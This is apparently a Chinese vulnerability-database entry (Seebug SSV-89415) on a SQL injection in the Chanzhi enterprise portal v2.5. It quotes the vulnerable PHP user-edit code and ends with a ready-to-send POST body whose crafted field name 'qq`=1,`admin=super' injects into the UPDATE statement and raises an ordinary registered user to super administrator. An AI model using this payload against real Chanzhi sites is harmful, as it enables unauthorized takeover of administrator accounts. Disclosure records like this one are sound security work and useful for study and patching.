蝉知企业门户系统 v2.5 SQL 注入

基本字段

漏洞编号：: SSV-89415

披露/发现时间：: 未知

提交时间：: 2015-09-14

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: CZQYMHXT

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者匿名共获得 1.6KB

问题出在用户修改资料的地方<pre class="">/system/module/user/control.php</pre><pre class="">public function edit($account = '') { if(!$account or RUN_MODE == 'front') $account = $this->app->user->account; if($this->app->user->account == 'guest') $this->locate(inlink('login')); if(!empty($_POST)) { $this->user->update($account); ....... </pre>跟进updata/system/module/user/model.php<pre class="">public function update($account) { /* If the user want to change his password. */ if($this->post->password1 != false) { $this->checkPassword(); if(dao::isError()) return false; $password = $this->createPassword($this->post->password1, $account); $this->post->set('password', $password); } $user = fixer::input('post') ->cleanInt('imobile, qq, zipcode') ->setDefault('admin', 'no') ->remove('ip, account, join, visits') ->removeIF(RUN_MODE != 'admin', 'admin') ->get(); return $this->dao->update(TABLE_USER) ->data($user, $skip = 'password1,password2') ->autoCheck() ->batchCheck($this->config->user->require->edit, 'notempty') ->check('email', 'email') ->check('email', 'unique', "account!='$account'") ->checkIF($this->post->gtalk != false, 'gtalk', 'email') ->where('account')->eq($account) ->exec(); } </pre>fixer这个类的代码有点长就不贴了，看上面的代码也能大概看得懂它的作用。。普通用户和管理员是在一个表的，的区别就是 admin字段。总之对我们post的数据做了 foreach然后带入了 updata当然他有remove admin的，可是这太好绕过了。直接看利用吧~注册用户后来到 <a href="http://localhost/user-edit.html" rel="nofollow">http://localhost/user-edit.html</a>修改资料改包 post如下数据 ``` realname=aaaaaa&email=a%40qqqq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq`%3D1,`admin=super&gtalk= ``` 即可提升成为管理员。可以看mysql的日志<img alt="1.jpg" src="https://images.seebug.org/contribute/ae677b1d-fda0-429b-b601-7b54ee36609f-1.jpg" data-image-size="1220,53">